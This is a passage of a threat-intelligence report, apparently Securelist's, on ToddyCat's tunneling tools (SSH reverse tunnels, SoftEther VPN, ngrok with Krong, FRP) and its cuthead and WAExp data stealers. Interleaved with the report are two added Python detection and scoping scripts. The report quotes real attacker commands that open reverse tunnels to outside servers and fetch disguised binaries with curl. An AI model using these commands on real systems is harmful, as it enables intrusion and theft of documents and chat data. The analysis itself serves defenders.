  1069. <div id="attachment_112449" style="width: 746px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112449" class="size-full wp-image-112449" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03.png" alt="Access denied error and Security tab for the AppReadiness folder" width="736" height="496" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03.png 736w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03-300x202.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03-519x350.png 519w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03-415x280.png 415w" sizes="(max-width: 736px) 100vw, 736px" /></a><p id="caption-attachment-112449" class="wp-caption-text">Access denied error and Security tab for the AppReadiness folder</p></div>
  1070. <p>To start the tunnel, attackers create a scheduled task that runs the following command.</p><pre class="crayon-plain-tag">C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o
  1071. StrictHostKeyChecking=accept-new -R 31481:localhost:53
  1072. systemtest01@103[.]27.202.85 -p 22222 -fN</pre><p>
  1073. This command creates an SSH connection to a remote server with the IP address <strong>103[.]27.202.85</strong> on port <strong>22222</strong> as the user named <strong>systemtestXX</strong>, where <strong>XX</strong> is a number. The connection redirects network traffic from a certain port on the server to a certain port on the infected host, which gives the malicious server constant access to the service running on the target host and listening on that port.</p>
  1074. <p>In the example above, the user <strong>systemtest01</strong> establishes a connection that redirects traffic from port <strong>31481</strong> on the server to port <strong>53</strong> on the target host. A connection like this, created on a domain controller, allows attackers to obtain the IP addresses of hosts on the internal network through DNS queries.</p>
  1075. <p>Each user is assigned a different port on the infected host. For example, the user <strong>systemtest05</strong> redirects traffic from the malicious server to port <strong>445</strong>, normally used by SMB services.</p>
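The a.bat lockdown and the SSH tunnel command above leave distinctive command lines in process-creation telemetry. The following detection logic is an added example, not code from the report or from the actor's toolset; it assumes a constructed pipe-separated log layout (host|user|image|command_line) and uses a TEST-NET address in place of the real server IP.

```python
"""Flag the AppReadiness ACL lockdown and the SSH reverse-tunnel command lines
described above in process-creation telemetry.

Added example, not code from the Securelist report or the actor's toolset.
Assumptions: each log line is 'host|user|image|command_line' (a constructed
layout), and the sample lines are constructed, with a TEST-NET address in
place of the real server IP."""
import ntpath
import shlex
from typing import Dict, List, Optional

APPREADINESS = r"c:\windows\appreadiness"
# Removing any of these principals locks everyone but SYSTEM out of the folder.
LOCKOUT_PRINCIPALS = {"administrators", "users", "authenticated users", "creator owner"}
# Extensions an OpenSSH identity file normally carries; .ini and .dat are not among them.
NORMAL_KEY_EXTS = {"", ".key", ".pem", ".ppk"}

SAMPLE_LOG = r"""
ws05|alice|C:\Windows\System32\icacls.exe|icacls "C:\Users\Public\share" /grant Users:R
dc01|SYSTEM|C:\Windows\System32\takeown.exe|takeown /f "C:\Windows\AppReadiness"
dc01|SYSTEM|C:\Windows\System32\icacls.exe|icacls "C:\Windows\AppReadiness" /remove "BUILTIN\Administrators"
dc01|SYSTEM|C:\Windows\System32\icacls.exe|icacls "C:\Windows\AppReadiness" /remove "NT AUTHORITY\Authenticated Users"
dc01|SYSTEM|C:\Program Files\OpenSSH\ssh.exe|C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o StrictHostKeyChecking=accept-new -R 31481:localhost:53 systemtest01@203.0.113.10 -p 22222 -fN
ws05|alice|C:\Program Files\OpenSSH\ssh.exe|ssh -i C:\Users\alice\.ssh\id_ed25519 alice@git.corp.example
""".strip().splitlines()


def tokens(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted spans intact."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def image_name(token: str) -> str:
    return ntpath.basename(token).lower()


def check_appreadiness_lockdown(cmdline: str) -> Optional[Dict[str, str]]:
    """takeown, or icacls /remove of a built-in principal, against C:\\Windows\\AppReadiness."""
    toks = tokens(cmdline)
    if not toks:
        return None
    exe = image_name(toks[0])
    lowered = [t.lower() for t in toks]
    if not any(t.rstrip("\\") == APPREADINESS for t in lowered[1:]):
        return None
    if exe in ("takeown", "takeown.exe"):
        return {"rule": "appreadiness_takeown", "detail": "ownership of AppReadiness taken"}
    if exe in ("icacls", "icacls.exe") and "/remove" in lowered:
        idx = lowered.index("/remove") + 1
        principal = toks[idx] if idx < len(toks) else ""
        if principal.split("\\")[-1].lower() in LOCKOUT_PRINCIPALS:
            return {"rule": "appreadiness_dacl_strip", "detail": f"{principal} removed from DACL"}
    return None


def check_ssh_reverse_tunnel(cmdline: str) -> Optional[Dict[str, str]]:
    """ssh with -R (remote forward); extra detail if the identity file looks disguised."""
    toks = tokens(cmdline)
    if not toks or image_name(toks[0]) not in ("ssh", "ssh.exe"):
        return None
    reasons: List[str] = []
    for i, t in enumerate(toks):
        nxt = toks[i + 1] if i + 1 < len(toks) else ""
        if t == "-R" and nxt:
            reasons.append(f"remote port forward {nxt}")
        elif t == "-i" and nxt:
            ext = ntpath.splitext(nxt)[1].lower()
            if ext not in NORMAL_KEY_EXTS:
                reasons.append(f"identity file with {ext} extension")
            if nxt.lower().startswith("c:\\windows\\"):
                reasons.append("identity file stored under C:\\Windows")
        elif t.startswith("-") and t not in ("-R", "-i", "-o", "-p") and "N" in t[1:]:
            reasons.append("no remote command (-N), tunnel only")
    # A plain interactive session is not a tunnel; only a remote forward is reported.
    if not any(r.startswith("remote port forward") for r in reasons):
        return None
    return {"rule": "ssh_reverse_tunnel", "detail": "; ".join(reasons)}


def scan(log_lines: List[str]) -> List[Dict[str, str]]:
    findings = []
    for line in log_lines:
        host, user, _image, cmdline = line.split("|", 3)
        hit = check_appreadiness_lockdown(cmdline) or check_ssh_reverse_tunnel(cmdline)
        if hit:
            findings.append({"host": host, "user": user, **hit})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['host']} {f['user']} {f['rule']}: {f['detail']}")
```

Because cmd.exe expands %Key% and handles the redirection before icacls starts, the logged icacls command line carries the expanded folder path and no redirection, which is what the sample lines reflect.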
  1076. <p>The remote server IP information is shown in the table below.</p>
  1077. <table width="100%">
  1078. <tbody>
  1079. <tr>
  1080. <td width="17%"><strong>IP</strong></td>
  1081. <td width="16%"><strong>Country + ASN</strong></td>
  1082. <td width="16%"><strong>Net name</strong></td>
  1083. <td width="17%"><strong>Net Description</strong></td>
  1084. <td width="17%"><strong>Address </strong></td>
  1085. <td width="17%"><strong>Email </strong></td>
  1086. </tr>
  1087. <tr>
  1088. <td>103.27.202[.]85</td>
  1089. <td>Thailand, AS58955</td>
  1090. <td>BANGMOD-VPS-NETWORK</td>
  1091. <td>Bangmod VPS Network</td>
  1092. <td>Bangmod-IDC Supermicro Thailand Powered by CSloxinfo</td>
  1093. <td>support@bangmod.co.th</td>
  1094. </tr>
  1095. </tbody>
  1096. </table>
  1097. <p>The whole process of creating an SSH tunnel can be described with the diagram given below.</p>
  1098. <div id="attachment_112450" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22103620/ToddyCat_data_clollection_and_tunneling_042.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112450" class="size-large wp-image-112450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22103620/ToddyCat_data_clollection_and_tunneling_042.png" alt="Diagram of SSH tunnel creation" width="1024" height="459" /></a><p id="caption-attachment-112450" class="wp-caption-text">Diagram of SSH tunnel creation</p></div>
  1099. <h3 id="softether-vpn">SoftEther VPN</h3>
  1100. <p>The next tool that the attackers used for tunneling was the server utility (VPN Server) from the SoftEther VPN package.</p>
  1101. <p><a href="https://www.softether.org" target="_blank" rel="noopener">SoftEther VPN</a> is an open-source solution developed as part of academic research at the University of Tsukuba that allows creating VPN connections via many popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.</p>
  1102. <p>To launch the VPN server, the attackers used the following files:</p>
  1103. <ul>
  1104. <li><strong>vpnserver_x64.exe</strong>: a digitally signed VPN server executable</li>
  1105. <li><strong>hamcore.se2</strong>: a container file that includes components required to run vpnserver_x64.exe</li>
  1106. <li><strong>vpn_server.config</strong>: server configuration</li>
  1107. </ul>
  1108. <p>In the operating system, the VPN server can run as a service or as an application with a GUI. The mode is set via a command-line parameter.</p>
  1109. <p>In virtually every case we observed, the attackers renamed <strong>vpnserver_x64.exe</strong> to hide its purpose in the infected system. The following names of, and paths to, this file are known:</p><pre class="crayon-plain-tag">c:\programdata\ssh\vmtools.exe
  1110. c:\programdata\lenovo\lenovo\kln.exe
  1111. c:\programdata\iobit\iobitrtt\tmp\mstime.exe
  1112. c:\perflogs\ecache\boot.exe
  1113. C:\users\public\music\wia.exe
  1114. c:\windows\debug\wia\wia.exe
  1115. c:\users\public\music\taskllst.exe
  1116. c:\programdata\lenovo\lenovo\main.exe
  1117. c:\programdata\intel\gcc\gcc\boot.exe
  1118. c:\programdata\lenovo\lenovodisplaycontrolcenterservice\netscan.exe
  1119. c:\programdata\kasperskylab\kaspersky.exe</pre><p>
  1120. You may notice that in some cases, the attackers used the names of security products to conceal the purpose of the file.</p>
  1121. <p>The file <strong>hamcore.se2</strong> was not renamed in the attacked systems, as it was loaded by the VPN server by name from the same folder where the VPN server executable was located.</p>
  1122. <p>To transfer the tools to victim hosts, the attackers used their standard technique of copying files through shared resources (<strong><a href="https://attack.mitre.org/techniques/T1021/002/" target="_blank" rel="noopener">T1021.002 Remote Services: SMB/Windows Admin Shares</a></strong>), and also downloaded files from remote resources using the <strong>curl</strong> utility (see below).</p><pre class="crayon-plain-tag">"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/main.js -o
  1123. c:\windows\debug\wia\wia.exe &gt; C:\WINDOWS\Temp\vwqkspeq.tmp 2&gt;&amp;1
  1124. "cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/ham.js -o
  1125. c:\windows\debug\wia\hamcore.se2 &gt; C:\WINDOWS\Temp\nohEicOE.tmp 2&gt;&amp;1</pre><p>
  1126. We observed the following remote resources being used as download sources.</p>
  1127. <table width="100%">
  1128. <tbody>
  1129. <tr>
  1130. <td width="65%"><strong>URL</strong></td>
  1131. <td width="35%"><strong>Original file name</strong></td>
  1132. </tr>
  1133. <tr>
  1134. <td>hxxp://www.netportal.or[.]kr/common/css/main.js</td>
  1135. <td>vpnserver_x64.exe</td>
  1136. </tr>
  1137. <tr>
  1138. <td>hxxp://www.netportal.or[.]kr/common/css/ham.js</td>
  1139. <td>Hamcore.se2</td>
  1140. </tr>
  1141. <tr>
  1142. <td>hxxp://23.106.122[.]5/hamcore.se2</td>
  1143. <td>Hamcore.se2</td>
  1144. </tr>
  1145. <tr>
  1146. <td>hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe</td>
  1147. <td>vpnserver_x64.exe</td>
  1148. </tr>
  1149. <tr>
  1150. <td>hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2</td>
  1151. <td>Hamcore.se2</td>
  1152. </tr>
  1153. </tbody>
  1154. </table>
  1155. <p>In most cases, the configuration file was copied along with the server executable. However, in some cases, it was not copied but created by executing vpnserver_x64.exe with the options <strong>/install</strong> or <strong>/usermode_hidetray</strong>, and then edited.</p><pre class="crayon-plain-tag">"cmd.exe" /C c:\users\public\music\taskllst.exe /install &gt; C:\Windows\Temp\fnOcaiqm.tmp 2&gt;&amp;1
  1156. "cmd.exe" /C c:\users\public\music\taskllst.exe /usermode_hidetray &gt; C:\Windows\Temp\TSwkLRsR.tmp</pre><p>
  1157. In this case, after installing the server in the system, the attackers changed the server settings in <strong>vpn_server.config</strong>.</p>
  1158. <p>Data for connecting the remote client to the server and its authentication details are added to the configuration file:</p>
  1159. <table width="100%">
  1160. <tbody>
  1161. <tr>
  1162. <td width="60%"><strong>AccountName</strong></td>
  1163. <td width="40%"><strong>Hostname</strong></td>
  1164. </tr>
  1165. <tr>
  1166. <td>ha.bbmouseme[.]com</td>
  1167. <td>118[.]193.40.42</td>
  1168. </tr>
  1169. </tbody>
  1170. </table>
  1171. <h3 id="ngrok-agent-and-krong">Ngrok agent and Krong</h3>
  1172. <p>Another way the attackers accessed the remote infrastructure was by tunneling to a legitimate cloud provider. An application running on the user&#8217;s host with access to the local infrastructure can connect through a legitimate agent to the cloud and redirect traffic or run certain commands.</p>
  1173. <p><a href="https://ngrok.com/docs/agent/" target="_blank" rel="noopener">Ngrok</a> is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The attackers installed ngrok on target hosts and used it to redirect C2 traffic from the cloud infrastructure to a certain port on these hosts.</p>
  1174. <p>The agent can be started, for instance, with the following command.</p><pre class="crayon-plain-tag">"cmd" /c "cd C:\windows\temp\ &amp; Intel.exe tcp --region=ap --remote-addr=1.tcp.ap.ngrok.io:21146 54112 --
  1175. authtoken 2GskqGD&lt;token&gt;txB7WyV"</pre><p>
  1176. The port where ngrok redirects C2 traffic is also the port that another tool, Krong, listens on. Krong is a DLL file <a href="https://encyclopedia.kaspersky.com/glossary/dll-sideloading/" target="_blank" rel="noopener">side-loaded</a> <strong>(<a href="https://attack.mitre.org/techniques/T1574/002/" target="_blank" rel="noopener">T1574.002 Hijack Execution Flow: DLL Side-Loading</a>)</strong> with a legitimate application digitally signed by AVG TuneUp. The tool receives through the command-line interface the address and the port on which to expect a connection.</p><pre class="crayon-plain-tag">"cmd" /c "cd C:\windows\temp\ &amp; SystemInformation.exe 0.0.0.0 54112"</pre><p>
  1177. Krong is a proxy that encrypts the data transmitted through it using the XOR function.</p>
  1178. <div id="attachment_112451" style="width: 343px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112451" class="size-full wp-image-112451" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05.png" alt="Code snippet for deciphering received data" width="333" height="457" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05.png 333w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05-219x300.png 219w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05-255x350.png 255w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05-204x280.png 204w" sizes="(max-width: 333px) 100vw, 333px" /></a><p id="caption-attachment-112451" class="wp-caption-text">Code snippet for deciphering received data</p></div>
  1179. <p>This allows Krong to hide the contents of the traffic to evade detection.</p>
  1180. <h3 id="frp-client">FRP client</h3>
  1181. <p>After creating tunnels on target hosts using OpenSSH or SoftEther VPN, attackers additionally install the <a href="https://github.com/fatedier/frp" target="_blank" rel="noopener">FRP client</a>. FRP is a fast reverse proxy written in Go that allows access from the Internet to a local server located behind a NAT or firewall. FRP has a web interface for changing settings and viewing connection statistics.</p>
  1182. <p>The attackers used two files to run the client:</p>
  1183. <ul>
  1184. <li><strong>Frpc.exe</strong>: an FRP client executable file</li>
  1185. <li><strong>Frpc.toml</strong>: a client configuration file</li>
  1186. </ul>
  1187. <p>The files are given arbitrary names. Also, the configuration file extension is changed from the standard .toml to .ini, as is the case with OpenSSH private key files.</p>
  1188. <p>After copying the files to the target host, the attackers create a service with an arbitrary name, which is started via the following command.</p><pre class="crayon-plain-tag">c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini</pre><p>
  1189. This starts the FRP client with the configuration file &#8220;tc.ini&#8221;. The traffic is then routed from C2 through this tool.</p>
  1190. <h2 id="data-collection-tools">Data collection tools</h2>
  1191. <h3 id="cuthead-for-data-collection">Cuthead for data collection</h3>
  1192. <p>Recently, ToddyCat started using a new tool we named <strong>cuthead</strong> to search for documents. The name originated from the &#8220;file description&#8221; field of the sample we found. It is a .NET compiled executable designed to search for files and store those it finds inside an archive. The tool can search for specified file extensions or words in the file name.</p>
  1193. <p>Cuthead tool accepts the following arguments:</p><pre class="crayon-plain-tag">fkw.exe &lt;date&gt; &lt;extensions&gt; [keywords]</pre><p>
  1194. <ul>
  1195. <li><strong>Date</strong>: the date when the file was last modified, in <strong>yyyyMMdd</strong> format. The search looks for files modified on that date or later</li>
  1196. <li><strong>Extensions</strong>: a string without spaces that contains file extensions separated by semicolons</li>
  1197. <li><strong>Keywords</strong>: a string without spaces that contains semicolon-delimited words to look for in file names</li>
  1198. </ul>
  1199. <p>Here is an example of a <strong>cuthead</strong> launch command.</p><pre class="crayon-plain-tag">"c:\intel\fkw.exe" 20230626 pdf;doc;docx;xls;xlsx</pre><p>
  1200. In this case, the attackers collected all MS Excel, MS Word and PDF files modified on or after June 26, 2023.</p>
  1201. <p>Once launched, the tool processes the command-line parameters and begins a recursive search for files in the file system on all available drives (<strong><a href="https://attack.mitre.org/techniques/T1005/" target="_blank" rel="noopener">T1005 Data from Local System</a></strong>). Folders that contain the following substrings are excluded from the search.</p><pre class="crayon-plain-tag">$
  1202. Windows
  1203. Program Files
  1204. Programdata
  1205. Application Data
  1206. Program Files (x86)
  1207. Documents and Settings</pre><p>
  1208. Also, the files are excluded from the search if they meet the following criteria:</p>
  1209. <ul>
  1210. <li>The file size is greater than 50 MB (52428800 bytes).</li>
  1211. <li>The file extensions do not match those specified in the command-line parameters.</li>
  1212. <li>The names do not contain the keywords specified in the command-line parameters.</li>
  1213. </ul>
  1214. <p>A list of files found by the search is passed to the function that creates ZIP archives with the password &#8220;Unsafe404&#8221;. In different versions of the tool, this function has different names but the same purpose. The open-source tool <a href="https://github.com/icsharpcode/SharpZipLib" target="_blank" rel="noopener">icsharpcode/SharpZipLib</a> v. 0.85.4.369 is used for creating archives (<strong><a href="https://attack.mitre.org/techniques/T1560/002/" target="_blank" rel="noopener">T1560.002 Archive Collected Data: Archive via Library</a></strong>).</p>
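For incident responders, the selection rules above are also a way to scope what a cuthead run would have gathered from a host. The script below is an added example (not cuthead itself and not code from the report): it parses a cuthead command line recovered from logs and re-applies the date, extension, keyword, size and folder rules to a directory tree, leaving the archive step out. It assumes folder exclusion matches the folder name case-insensitively and that any one keyword is enough for a match; the fixture tree is constructed.

```python
"""Re-apply cuthead's selection rules from a command line recovered in logs, so
responders can scope which documents on a host the tool would have gathered.

Added example, not cuthead itself nor code from the Securelist report. The
rules are the ones the report describes (date, extension list, keyword list,
50 MB cap, excluded folder-name substrings); the archive step is left out.
Assumptions: folder exclusion is matched case-insensitively on the folder
name, and any one keyword is enough for a match."""
import os
import shlex
import tempfile
from datetime import datetime
from typing import List, Set, Tuple

MAX_SIZE = 52428800  # 50 MB, as stated in the report
EXCLUDED_SUBSTRINGS = ("$", "windows", "program files", "programdata",
                       "application data", "program files (x86)", "documents and settings")


def parse_cuthead_cmdline(cmdline: str) -> Tuple[datetime, Set[str], List[str]]:
    """'"c:\\intel\\fkw.exe" 20230626 pdf;doc;docx;xls;xlsx [kw1;kw2]' -> (since, exts, keywords)."""
    args = shlex.split(cmdline, posix=False)[1:]
    if len(args) < 2:
        raise ValueError("cuthead needs at least <date> <extensions>")
    since = datetime.strptime(args[0], "%Y%m%d")  # local midnight of that day
    exts = {"." + e.lower().lstrip(".") for e in args[1].split(";") if e}
    keywords = [k.lower() for k in args[2].split(";") if k] if len(args) > 2 else []
    return since, exts, keywords


def folder_excluded(name: str) -> bool:
    low = name.lower()
    return any(s in low for s in EXCLUDED_SUBSTRINGS)


def file_selected(path: str, since: datetime, exts: Set[str], keywords: List[str]) -> bool:
    name = os.path.basename(path)
    if os.path.splitext(name)[1].lower() not in exts:
        return False
    if keywords and not any(k in name.lower() for k in keywords):
        return False
    st = os.stat(path)
    if st.st_size > MAX_SIZE:
        return False
    return datetime.fromtimestamp(st.st_mtime) >= since


def scope_collection(root: str, cmdline: str) -> List[str]:
    """Paths under root that cuthead, run with this command line, would have picked up."""
    since, exts, keywords = parse_cuthead_cmdline(cmdline)
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if not folder_excluded(d)]  # prune excluded folders
        for fn in filenames:
            p = os.path.join(dirpath, fn)
            if file_selected(p, since, exts, keywords):
                hits.append(p)
    return sorted(hits)


def build_sample_tree() -> str:
    """Constructed fixture: a small 'drive' with documents of different ages and sizes."""
    root = tempfile.mkdtemp(prefix="cuthead_scope_")

    def put(rel: str, when: datetime, size: int = 16) -> None:
        p = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as fh:
            fh.truncate(size)  # sparse on most file systems, so the oversize case is cheap
        ts = when.timestamp()
        os.utime(p, (ts, ts))

    put("Users/bob/Documents/budget.xlsx", datetime(2023, 7, 1, 9, 0))            # selected
    put("Users/bob/Documents/contract.pdf", datetime(2023, 6, 26, 14, 0))         # selected (same day)
    put("Users/bob/Documents/old_report.pdf", datetime(2023, 6, 1, 9, 0))         # too old
    put("Users/bob/Documents/notes.txt", datetime(2023, 7, 1, 9, 0))              # extension not listed
    put("Users/bob/Desktop/plan.docx", datetime(2023, 7, 1, 9, 0), MAX_SIZE + 1)  # over 50 MB
    put("Windows/Temp/cache.doc", datetime(2023, 7, 1, 9, 0))                     # excluded folder
    return root


def run_demo(cmdline: str) -> List[str]:
    """Build the fixture and return the basenames cuthead would have selected."""
    root = build_sample_tree()
    return [os.path.basename(h) for h in scope_collection(root, cmdline)]


if __name__ == "__main__":
    print(run_demo(r'"c:\intel\fkw.exe" 20230626 pdf;doc;docx;xls;xlsx'))
```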
  1215. <p>Several later variants of cuthead were found with all required options – a list of file extensions and a last modified date that was typically within the previous 7 days – hardcoded within the software. We believe this was done to automate the collection process.</p>
  1216. <h3 id="waexp-whatsapp-data-stealer">WAExp: WhatsApp data stealer</h3>
  1217. <p>This tool is written in .NET and designed to search for and collect browser local storage files containing data from the web version of WhatsApp (web.whatsapp.com). For users of the WhatsApp web app, their browser local storage contains their profile details, chat data, the phone numbers of users they chat with and current session data. Attackers can gain access to this data by copying the browser&#8217;s local storage files.</p>
  1218. <p>The executable accepts the following arguments.</p><pre class="crayon-plain-tag">app.exe [check|copy|start] [remote]</pre><p>
  1219. <strong>Check</strong>: checks whether the data is present on the host.<br />
  1220. <strong>Copy</strong>: copies the data it finds to the temporary folder.<br />
  1221. <strong>Start</strong>: first copies the data to the temporary folder and then packs it into an archive file.<br />
  1222. <strong>Remote</strong>: the name of the remote host.</p>
  1223. <p>When executed with &#8220;<strong>check</strong>&#8221;, the tool begins searching for user folders. If &#8220;<strong>remote</strong>&#8221; is specified, user folders are searched under &#8220;<strong>\\[remote]\C$\users\</strong>&#8221;. If it is not specified, the malware reads the system drive letter from the <strong>%SystemDrive%</strong> environment variable and searches inside the Users folder on that drive. Next, the tool goes through all folders in this directory except the following default ones.</p><pre class="crayon-plain-tag">All Users
  1224. Default User
  1225. Default
  1226. Public</pre><p>
  1227. After it locates the user folders, WAExp seeks out file paths for WhatsApp database files in the Chrome, Edge, and Mozilla local storages.</p>
  1228. <p>For Chrome, the tool opens <strong>&lt;User&gt;\Appdata\local\Google\</strong> and for Edge, <strong>&lt;User&gt;\Appdata\local\Microsoft\Edge\</strong>. Inside these, it looks for a folder with the following name among the subfolders.</p><pre class="crayon-plain-tag">https_web.whatsapp.com_0.indexeddb.leveldb
  1229. For Mozilla, the tool opens <strong>&lt;User&gt;\Appdata\roaming\</strong> and looks for a folder with the following name among the subfolders:</p><pre class="crayon-plain-tag">https+++web.whatsapp.com
  1230. Roaming may contain several Mozilla folders with web.whatsapp.com storage data. For example, Mozilla Thunderbird can store this data too, as it supports a WhatsApp plugin.</p>
  1231. <div id="attachment_112452" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112452" class="size-large wp-image-112452" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-1024x262.png" width="1024" height="262" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-1024x262.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-300x77.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-768x196.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-740x189.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-1096x280.png 1096w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06-800x204.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160252/ToddyCat_data_collection_and_tunneling_06.png 1131w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112452" class="wp-caption-text">WAExp &#8220;check&#8221; output with results for Chrome, Edge, Firefox and Thunderbird</p></div>
  1232. <p>In the image above, you can see the output of the tool running with the &#8220;<strong>check</strong>&#8221; parameter. It shows storage files for <strong>Chrome</strong>, <strong>Edge</strong> and <strong>Firefox</strong>, as well as the <strong>Thunderbird</strong> mail client detected on the host.</p>
  1233. <p>When executed with the &#8220;<strong>copy</strong>&#8221; parameter, WAExp copies all whatsapp.com data storage files in the system to the following temporary storage folder.</p><pre class="crayon-plain-tag">C:\Programdata\Microsoft\Default\</pre><p>
  1234. The last parameter that the tool uses is <strong>&#8220;start&#8221;</strong>. It gathers target files inside a temporary folder, as described in the <strong>copy</strong> function, and packs these into an archive with the help of the <strong>System.IO.Compression.ZipFile</strong> module (<strong><a href="https://attack.mitre.org/techniques/T1560/002/" target="_blank" rel="noopener">T1560.002 Archive Collected Data: Archive via Library</a></strong>).</p>
  1235. <p>It saves the archive file under a name consisting of the word &#8216;Default&#8217; and a timestamp, without extension, at the following path:</p><pre class="crayon-plain-tag">C:\Programdata\Microsoft\Default-yyyyMMdd-hhmmss</pre><p>
  1236. After that, it deletes the temporary folder, along with the web browsers&#8217; and other clients&#8217; folders containing <strong>web.whatsapp.com</strong> data.</p>
  1237. <p>The image below shows an example of WAExp output when run with the various startup parameters.</p>
  1238. <div id="attachment_112453" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112453" class="size-large wp-image-112453" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-1024x510.png" alt="WAExp output for its various command-line parameters" width="1024" height="510" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-1024x510.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-300x149.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-768x382.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-703x350.png 703w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-740x368.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-563x280.png 563w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07-800x398.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19160441/ToddyCat_data_collection_and_tunneling_07.png 1069w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112453" class="wp-caption-text">WAExp output for its various command-line parameters</p></div>
  1239. <p>The operations shown above collect <strong>Chrome</strong> data and generate an archive, whose contents are shown below.</p>
